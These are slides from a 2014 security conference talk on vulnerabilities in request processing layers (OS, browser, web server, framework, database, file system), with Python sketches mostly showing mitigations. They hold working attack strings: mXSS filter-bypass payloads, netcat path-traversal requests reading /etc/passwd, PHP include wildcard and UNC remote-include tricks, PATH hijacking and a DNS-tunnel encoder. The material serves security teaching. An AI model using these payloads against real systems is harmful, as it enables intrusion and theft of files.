Vulnerabilities in data processing layers
Omar Ganiev
PHDays 2014
Moscow
whoami
• Beched (ahack.ru, @ahack_ru)
• Math student
• RDot.Org (CTF) team
• Penetration testing expert at IncSecurity
Intro
• An application’s behaviour is defined not only by
its code, but also by plenty of external
factors, such as its environment
• We’ll dig into the different layers of data
processing and point out potential
dangers that developers often ignore
Program? Turing machine!
Real program
• A lot of inputs
• User supplied input
• Operating system environment
• Hardware
• We’ll discuss the general case, paying
special attention to web applications
Web application interaction
[Diagram: Browser, Web server, Application]
Web application interaction
[Diagram: Browser, Web server, Framework, Database, Application]
Request processing layers
• Hardware
• Operating system
• Browser
• Network
• Web server
• Framework
• Application
• Database
• File system
Request processing layers
• In the general case:
Hardware
OS
Client
Network
Server
Data processing
• Each layer has its own inputs and outputs
• Each input and output is processed in some way:
normalized, filtered, etc.
• Developers often consider only the user inputs
that are explicitly defined in the code
• Another problem is that output often contains
sensitive information that is also used as an input
for some functions
Input/output trust
• Which input can be trusted, and which one is
user-controlled?
• Which input is secret, and which one is
contained in output?
• This is not always clear
• Let’s go through each abstract layer and look at
the weaknesses in its input and output processing
Hardware layer
• Input from the pseudo-devices /dev/random and
/dev/urandom in Linux is not always safe, see
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Gutterman.pdf
• The speed of a system clock’s quartz crystal depends
on temperature. This creates a side channel
(clock skew) for attacking anonymity systems:
http://www.cl.cam.ac.uk/~sjm217/papers/ccs06hotornot.pdf
• Cryptanalysis via various physical side channels
Operating system layer
• int main() { system("id"); }
• Safe? No! The application itself takes no input,
but its environment does
• PATH=.:$PATH
• Put a payload in ./id and run the executable
• Real-world example: CVE-2013-1662, unsafe
popen of lsb_release in the suid vmware-mount
binary
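The PATH trick above can be reproduced without touching any real binary. The sketch below is only an illustration and assumes a POSIX system: it asks the standard library which file a bare command name would resolve to once an attacker-controlled directory is put in front of PATH. The helper names and the fake `id` script are hypothetical.

```python
import os
import shutil
import stat
import tempfile


def resolve_command(name, path_value):
    """Return the file that a bare command name resolves to under the given PATH."""
    return shutil.which(name, path=path_value)


def demo_path_hijack():
    """Show that an attacker-controlled PATH entry wins over the system binary."""
    with tempfile.TemporaryDirectory() as attacker_dir:
        fake_id = os.path.join(attacker_dir, "id")
        with open(fake_id, "w") as fh:
            fh.write("#!/bin/sh\necho hijacked\n")
        os.chmod(fake_id, stat.S_IRWXU)  # must be executable to be picked up

        # Equivalent of PATH=<attacker_dir>:$PATH
        hijacked_path = attacker_dir + os.pathsep + os.environ.get("PATH", "")
        return resolve_command("id", hijacked_path) == fake_id


if __name__ == "__main__":
    print("bare 'id' resolves to the attacker file:", demo_path_hijack())
```

Calling the program by its absolute path (for example /usr/bin/id) removes this particular input.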
Operating system layer
• External libraries are another input point
• This enables attacks such as DLL injection
and hooking
• CreateRemoteThread, SetWindowsHookEx,
etc. in Windows
• LD_PRELOAD in Linux
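One common mitigation on the launching side is to hand child processes a cleaned environment. The following is a minimal sketch under stated assumptions: the fixed PATH value and the policy of dropping every LD_* variable are illustrative choices, not something prescribed by the talk.

```python
import os

# Hypothetical policy: a fixed PATH and no dynamic-linker overrides.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def sanitized_env(env):
    """Return a copy of env without LD_* variables and with a fixed PATH."""
    clean = {key: value for key, value in env.items() if not key.startswith("LD_")}
    clean["PATH"] = SAFE_PATH
    return clean


if __name__ == "__main__":
    inherited = dict(os.environ, LD_PRELOAD="./evil.so", PATH=".:/bin")
    print(sanitized_env(inherited).get("LD_PRELOAD"))  # prints None
```

The result can be passed as the env argument of subprocess.run together with an absolute path to the executable.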
Browser layer
• The browser applies many transformations to the
data
• The purpose of these transformations is standards
compliance (RFCs, W3C)
• They are often applied after the web application
has validated its input
• Breaking the standards leads to various client-side
attacks
Browser layer
• XSS, UI redressing, URL spoofing, HTTP
response splitting, open redirects via a
single HTTP parameter, the Request-path:
https://rdot.org/forum/showthread.php?t=2596 (by @black2fan)
• Browsers handle the Location response
header incorrectly and inject malicious data into the
Request-path
Browser layer
• Mutation XSS (mXSS) is an attack on the output
• Browsers compile invalid HTML pages into some
canonical form
• The transformations can be quite weird:
https://cure53.de/fp170.pdf
• More examples:
<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>
<img src= alt=" onerror=alert(1);//">
• Try it at http://html5sec.org/innerhtml/
Browser layer
• Checks and input validation are typically done
on the server side
• Hence, mXSS can bypass such checks and WAFs
• Consider a signature-based filter (for example, in the
Bitrix CMS)
• We can encode blacklisted words in the following mXSS
payload for IE:
<listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing>
• The browser renders this as <img src=1 onerror=alert(1)>,
which bypasses the WAF
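Why a signature check misses this payload can be sketched in a few lines. The blacklist below is a made-up stand-in for a signature-based filter, and html.unescape is only a rough approximation of the mutation the browser performs, so treat this as an illustration rather than a model of IE or of any real WAF.

```python
import html

# Hypothetical signatures of a naive server-side filter.
BLACKLIST = ("onerror", "<script", "javascript:")

PAYLOAD = "<listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing>"


def waf_allows(payload):
    """Return True when no blacklisted signature occurs in the raw payload."""
    lowered = payload.lower()
    return not any(signature in lowered for signature in BLACKLIST)


def approximate_mutation(payload):
    """Rough stand-in for the browser-side mutation: decode HTML entities."""
    return html.unescape(payload)


if __name__ == "__main__":
    print("filter passes raw payload:", waf_allows(PAYLOAD))
    print("after decoding:", approximate_mutation(PAYLOAD))
```

The filter sees only the encoded form, while the dangerous form appears after a transformation that happens later, on the client.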
Network layer
• TCP timestamps can reveal various
information (see Hardware layer)
• Network administrators often forget about
internal recursive DNS servers, which make it
possible to move data through a DNS tunnel,
bypassing firewalls
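To see why a recursive resolver is enough for a tunnel, note that arbitrary bytes fit into the labels of a query name. The sketch below only builds and parses such names. The zone tunnel.example is a placeholder, the base32 scheme is an assumption, and the overall 253-character name limit is not enforced here.

```python
import base64

MAX_LABEL = 63  # DNS limit for a single label


def to_dns_name(data, zone):
    """Encode bytes as base32 labels under the given zone."""
    encoded = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    return ".".join(labels + [zone])


def from_dns_name(name, zone):
    """Recover the bytes from a name produced by to_dns_name."""
    encoded = name[: -len(zone) - 1].replace(".", "").upper()
    padding = "=" * (-len(encoded) % 8)
    return base64.b32decode(encoded + padding)


if __name__ == "__main__":
    query = to_dns_name(b"secret data", "tunnel.example")
    print(query, from_dns_name(query, "tunnel.example"))
```

An authoritative server for the zone would receive such names through the internal resolver, which is why resolver logs are worth monitoring for long, high-entropy labels.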
Web server layer
• An HTTP daemon should verify the validity of
incoming requests
• Fields should conform to the RFCs
• But can we assume that this is the case and
trust every HTTP header field?
• No! Apache is a typical example of
software that breaks the rules
Web server layer
• Let’s discover Apache magic
$ echo a | nc localhost 80
• 400 error? Nope, the index page is loaded. Note this:
["SERVER_PROTOCOL"]=>
string(8) "HTTP/0.9"
["REQUEST_METHOD"]=>
string(1) "a"
["QUERY_STRING"]=>
string(0) ""
["REQUEST_URI"]=>
string(0) ""
Web server layer
• $_SERVER['REQUEST_URI'] is often used for file inclusion.
Can we perform a path traversal in the path itself (not in QUERY_STRING)?
Example:
<?php
$docroot = $_SERVER['DOCUMENT_ROOT'];
// Split off the query string and drop the first character of the path
$url = explode('?', $_SERVER['REQUEST_URI']);
$path = substr($url[0], 1);
$parts = explode('/', $path);
// Only the first path segment is checked, the rest is used as is
if($parts[0] == 'assets') {
readfile("$docroot/$path");
exit();
}
Web server layer
• Okay, let’s try:
$ echo 'GET /../../../../../etc/passwd' | nc localhost 80
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
Web server layer
• Here comes double-slash magic:
$ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
…
• Clearly, this should not work, but it does. Do
not trust the web server’s data
processing!
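The logic of the vulnerable snippet and one possible fix can be compared side by side. This is a sketch under assumptions: the document root /var/www is hypothetical, vulnerable_target mirrors the PHP code shown earlier, and safe_target is just one way to normalize before validating.

```python
import os


def vulnerable_target(docroot, request_uri):
    """Mirror of the PHP snippet: only the first path segment is checked."""
    path = request_uri.split("?")[0][1:]
    if path.split("/")[0] != "assets":
        return None
    return f"{docroot}/{path}"


def safe_target(docroot, request_uri):
    """Normalize first, then validate the resolved location."""
    path = request_uri.split("?")[0].lstrip("/")
    assets_root = os.path.realpath(os.path.join(docroot, "assets"))
    candidate = os.path.realpath(os.path.join(docroot, path))
    if os.path.commonpath([assets_root, candidate]) != assets_root:
        return None
    return candidate


if __name__ == "__main__":
    uri = "xassets/../../..//etc/passwd"
    print(os.path.normpath(vulnerable_target("/var/www", uri)))
    print(safe_target("/var/www", uri))
```

The safe variant never looks at the raw string: it decides based on where the path actually ends up.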
Web server layer
• Similar constructions are often used in MVC projects
to parse the controller and action names. Example
from an article in Xakep magazine (167):
$piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']);
…
$controllerName = $piecesOfUrl[1];
…
include $fileWithControllerPath;
Web server layer
• It looks secure, but what if someone
runs it on a Windows box with
Apache?
• The following payload will then include
myfile.php:
GET a/................myfile/..//
• There are lots of such code snippets on GitHub
(vulnerable to file inclusion via REQUEST_URI,
not necessarily only under Windows)
Web server layer
• The Host header is also untrustworthy:
using $_SERVER['HTTP_HOST'] can lead
to logic vulnerabilities
• For instance, spoofing of the password reset
link
• See
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
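A typical defence is to build absolute links only from a configured list of hostnames. The sketch below assumes a hypothetical site served as example.com and www.example.com. The function names and the /reset URL layout are invented for illustration.

```python
# Hypothetical configuration: the only hostnames this site is served under.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
CANONICAL_HOST = "example.com"


def trusted_host(host_header):
    """Return the Host header value only if it is allowlisted, else the canonical host."""
    host = (host_header or "").strip().lower()
    return host if host in ALLOWED_HOSTS else CANONICAL_HOST


def build_reset_link(host_header, token):
    """Build a password reset link that cannot point to an attacker's domain."""
    return f"https://{trusted_host(host_header)}/reset?token={token}"


if __name__ == "__main__":
    print(build_reset_link("evil.example.net", "abc123"))
```

With this approach a spoofed Host value never reaches the e-mail sent to the victim.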
Web server layer
• That was all about input. What about output?
• Web servers reveal the current server time (Date
header) and static files’ modification times
(Last-Modified header)
• This can be used to predict the PRNG seed in
PHP (together with the PHPSESSID cookie value):
http://habrahabr.ru/company/pt/blog/149746/
Web server layer
• Also consider the following code:
function genid() {
mt_srand(time());
$h = fopen('entropy', 'r');
$fstat = fstat($h);
fclose($h);
return md5(mt_rand() . $fstat[ 'atime' ] . $fstat[ 'mtime' ]);
}
• An id generated by such a function is insecure: the seed
time() is visible in the Date header, mtime comes from the
Last-Modified header, and atime can be set to a known value
by requesting the ‘entropy’ file and reading the Date header
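How small the search space becomes can be shown with an analogue of genid(). This is only a sketch: Python's random module is not PHP's mt_rand, so the numbers differ from a real PHP target, and the timestamps and the five-second window are made-up values. The last function shows the usual alternative, an id taken from the OS CSPRNG.

```python
import hashlib
import random
import secrets


def weak_genid(now, atime, mtime):
    """Analogue of genid(): every value that feeds the hash is guessable."""
    rng = random.Random(now)  # seeded with the current time, like mt_srand(time())
    material = f"{rng.getrandbits(31)}{atime}{mtime}"
    return hashlib.md5(material.encode()).hexdigest()


def recover_inputs(target_id, date_header_ts, mtime, window=5):
    """Brute-force the few unknown seconds around the observed Date header."""
    candidates = range(date_header_ts - window, date_header_ts + window + 1)
    for now in candidates:
        for atime in candidates:
            if weak_genid(now, atime, mtime) == target_id:
                return now, atime
    return None


def strong_genid():
    """Unpredictable id from the operating system's CSPRNG."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    victim = weak_genid(1400000003, 1400000001, 1390000000)
    print(recover_inputs(victim, 1400000000, 1390000000))
```

With mtime known exactly, the attacker has to try only about a hundred combinations here.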
Framework layer
• Do not blindly trust frameworks! Not every
method is secure; read the source code and
documentation
• Insecure Ruby on Rails methods: http://rails-sqli.org/
• The rather popular Yii class with a lot of find*()
methods without SQL injection protection:
https://github.com/yiisoft/yii/blob/master/framework/db/ar/CActiveRecord.php
Framework layer
• Example of insecure data processing inside the
CakePHP framework:
http://www.securityfocus.com/archive/1/527974/30/0/threaded
• The data (the PATH_INFO variable) is validated first
and decoded afterwards, so the check can be
bypassed:
/theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
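The effect of the ordering can be demonstrated with a shortened version of the payload. The two functions below are simplified illustrations of "validate, then decode" versus "decode, then validate". They are not CakePHP's actual code, and the ".." check is deliberately minimal.

```python
from urllib.parse import unquote


def check_then_decode(raw_path):
    """Flawed order: the traversal check runs on still-encoded data."""
    if ".." in raw_path:
        raise ValueError("traversal rejected")
    return unquote(raw_path)


def decode_then_check(raw_path):
    """Safer order: decode (format) first, then validate the final value."""
    decoded = unquote(raw_path)
    if ".." in decoded.split("/"):
        raise ValueError("traversal rejected")
    return decoded


if __name__ == "__main__":
    payload = "/theme/Test1/%2e.//%2e./etc/passwd"
    print(check_then_decode(payload))  # the ".." segments slip through
    try:
        decode_then_check(payload)
    except ValueError as error:
        print("blocked:", error)
```

Because %2e. contains no literal "..", the first function accepts the path and only afterwards turns it into a traversal.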
Database layer
• A DBMS stores data in fields of a particular
type (VARCHAR, BLOB, TEXT, INT, etc.)
• Each type has its own limitations, so input
data gets transformed: trimmed or truncated
• An SQL column truncation attack can lead to the
compromise of any user account in the system:
INSERT INTO `users` VALUES ('admin x', 'password');
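The mechanics of the attack can be simulated without a database. The sketch assumes behaviour commonly associated with MySQL in non-strict mode (over-long values are silently truncated, and trailing spaces are ignored when comparing strings). The column width of 10 and the helper names are hypothetical.

```python
COLUMN_WIDTH = 10  # hypothetical VARCHAR(10) username column


def app_username_taken(users, name):
    """Application-side uniqueness check: exact string comparison."""
    return any(stored == name for stored, _ in users)


def db_insert(users, name, password):
    """Simulated non-strict insert: silently truncate to the column width."""
    users.append((name[:COLUMN_WIDTH], password))


def db_find(users, name):
    """Simulated lookup that ignores trailing spaces when comparing."""
    return [row for row in users if row[0].rstrip(" ") == name.rstrip(" ")]


if __name__ == "__main__":
    users = [("admin", "s3cret")]
    attacker_name = "admin" + " " * 5 + "x"  # 11 characters, one too many
    if not app_username_taken(users, attacker_name):
        db_insert(users, attacker_name, "password")
    print(db_find(users, "admin"))  # two rows now match "admin"
```

The application compares the untruncated string, while the database stores and compares the transformed one, so a second "admin" row appears with a password the attacker knows.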
Database layer
• The PHP function addslashes can be bypassed:
http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
• This is due to charset transformations when the
MySQL connection uses a multi-byte charset
such as BIG5 or GBK
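The byte-level trick can be shown with Python's own GBK codec. The addslashes function below is a hand-written byte-wise analogue of the PHP function, written for this illustration only, and the input string is a made-up example.

```python
def addslashes(data):
    """Byte-wise analogue of PHP addslashes(): escape ', ", backslash and NUL."""
    out = bytearray()
    for byte in data:
        if byte in (0x27, 0x22, 0x5C):
            out += b"\\" + bytes([byte])
        elif byte == 0x00:
            out += b"\\0"
        else:
            out.append(byte)
    return bytes(out)


user_input = b"\xbf' OR 1=1 -- "
escaped = addslashes(user_input)  # the quote becomes 0x5C 0x27
# In GBK, 0xBF 0x5C is a single two-byte character, so the backslash is absorbed.
as_seen_by_gbk = escaped.decode("gbk")

if __name__ == "__main__":
    print(escaped)
    print(as_seen_by_gbk)
```

After decoding, the quote is no longer preceded by a backslash, which is why escaping has to be charset-aware or replaced by parameterized queries.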
File system layer
• PHP has a lot of weird file path
normalization algorithms
• The FindFirstFile WinAPI function allows passing
wildcards instead of exact paths to include
functions under Windows:
https://rdot.org/forum/showthread.php?t=926
• For example, this will include C:boot.ini:
include 'C:<oot"<<';
File system layer
• In old versions of PHP:
/etc/passwd///[x4096]///.php = /etc/passwd ;
/etc/passwd///// = /etc/passwd
• open_basedir bypass via the glob wrapper:
http://ahack.ru/bugs/php-vulnerabilities-exploits.htm
• The path glob://… is first treated as
relative and only then converted into a URL
File system layer
• allow_url_include and allow_url_fopen
bypass via a UNC path:
include '//IP/path/shellcode.txt';
• Security checks are performed before the path is
transformed into a remote UNC path
Outro
• Interaction with a program passes through
different layers, and each layer has its own
parameters and data processing rules
• The rule: format (normalize) first, then validate
• Every variable that is not explicitly set in the
code should be treated as a potential source
of malicious data
Thanks for your attention!
Questions?
admin@ahack.ru
beched@incsecurity.ru
